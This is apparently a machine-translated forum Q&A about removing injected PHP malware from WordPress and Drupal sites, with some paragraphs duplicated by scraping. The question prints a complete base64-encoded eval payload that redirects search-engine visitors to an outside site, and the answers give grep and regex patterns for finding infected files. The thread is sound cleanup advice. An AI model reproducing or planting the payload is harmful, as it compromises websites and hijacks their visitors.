Wordpress 查找以eval（base64_decode）开头的恶意代码的模式_Wordpress_Drupal_Notepad++_Batch Processing

Wordpress 查找以eval（base64_decode）开头的恶意代码的模式

wordpress drupal notepad++

Wordpress 查找以eval（base64_decode）开头的恶意代码的模式,wordpress,drupal,notepad++,batch-processing,Wordpress,Drupal,Notepad++,Batch Processing,在我所有的Drupal和Wordpress站点中插入以下PHP时，我的服务器出现了问题我已经下载了我的网站的完整备份，在更改ftp详细信息并重新加载之前，我会将它们全部清理干净。希望这会让事情变得明朗起来我的问题是: 使用记事本++是否有*.风格的搜索条件可用于扫描备份文件并删除恶意代码行，而无需在本地计算机上单独执行这些操作？这显然会为我节省大量的时间。到目前为止，我一直在用空白代码替换以下代码，但评估代码在我的每个网站上都有所不同 eval(base64_decode("DQplcnJ

在我所有的Drupal和Wordpress站点中插入以下PHP时，我的服务器出现了问题

我已经下载了我的网站的完整备份，在更改ftp详细信息并重新加载之前，我会将它们全部清理干净。希望这会让事情变得明朗起来

我的问题是:

使用记事本++是否有
*.
风格的搜索条件可用于扫描备份文件并删除恶意代码行，而无需在本地计算机上单独执行这些操作？

这显然会为我节省大量的时间。到目前为止，我一直在用空白代码替换以下代码，但评估代码在我的每个网站上都有所不同

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

我会立即更改您的FTP详细信息。如果他们能够计算出密码，您不希望他们托管warez或其他东西

然后关闭你的网站，这样你的访问者就不会受到任何脚本或劫持

就搜索而言，像这样的正则表达式应该可以进行排序：

eval\(base64_decode\("[\d\w]+"\)\);

我会立即更改您的FTP详细信息。如果他们能够计算出密码，您不希望他们托管warez或其他东西

然后关闭你的网站，这样你的访问者就不会受到任何脚本或劫持

就搜索而言，像这样的正则表达式应该可以进行排序：

eval\(base64_decode\("[\d\w]+"\)\);

我的WordPress博客也有同样的问题。php文件被注入了这些评估行。我建议您重新安装WordPress/drupal，因为您的站点中可能已经存在一些其他脚本，然后更改所有密码

尝试通过ssh运行grep，例如

grep-r-H“eval base64_decode”

。它将显示哪些文件被感染。如果您有时间，请自动执行该过程，以便在再次发生时收到通知

将来，请始终更新WordPress/Drupal。

我的WordPress博客也有同样的问题。php文件中注入了这些评估行。我建议您重新安装WordPress/Drupal，因为您的站点中可能已经存在其他脚本，然后更改所有密码

尝试通过ssh运行grep，例如

grep-r-H“eval base64_decode”

。它将显示哪些文件被感染。如果您有时间，请自动执行该过程，以便在再次发生时收到通知

将来，请始终更新WordPress/Drupal。

如果您可以使用特殊工具删除此恶意代码，则会更容易，因为找到与所有代码匹配的实际正则表达式可能会很困难，您永远不知道是否有效，或者您破坏了您的网站。特别是当您有多个文件时，您应该通过以下命令：

grep -R eval.*base64_decode  .
grep -R return.*base64_decode  .

但是这还不够，所以你应该考虑使用这些S.

有关详细信息，请检查：

对于Drupal，请同时检查：

如果您可以使用特殊工具删除此恶意代码，这会更容易，因为找到与所有代码匹配的实际正则表达式可能会很困难，您永远不知道这是否有效，或者您破坏了您的站点。特别是当您有多个文件时，您应该通过以下命令来识别可疑文件：

grep -R eval.*base64_decode  .
grep -R return.*base64_decode  .

但是这还不够，所以你应该考虑使用这些S.

有关详细信息，请检查：

对于Drupal，还应检查：

可能的副本。您应该找出正在攻击您的网站的漏洞并修复它。否则它将在某个点被重新攻击。可能的副本您应该找出正在攻击您的网站的漏洞并修复它。否则它将在某个点被重新攻击。